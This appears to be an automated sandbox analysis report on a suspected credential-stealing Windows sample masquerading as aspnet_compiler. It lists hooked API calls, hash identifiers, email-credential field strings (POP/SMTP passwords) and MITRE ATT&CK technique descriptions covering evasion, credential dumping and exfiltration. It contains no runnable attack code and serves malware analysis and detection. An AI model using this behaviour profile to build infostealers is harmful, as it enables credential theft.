GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Function 00403C40 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

PopPassword, xrefs: 0040D0D0
PopServer, xrefs: 0040D099
PopPort, xrefs: 0040D0A7
Technology, xrefs: 0040D08D
PopAccount, xrefs: 0040D0B6
SmtpServer, xrefs: 0040D0DC
SmtpPort, xrefs: 0040D0EB
SmtpPassword, xrefs: 0040D117
EmailAddress, xrefs: 0040D074
SmtpAccount, xrefs: 0040D0FA

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

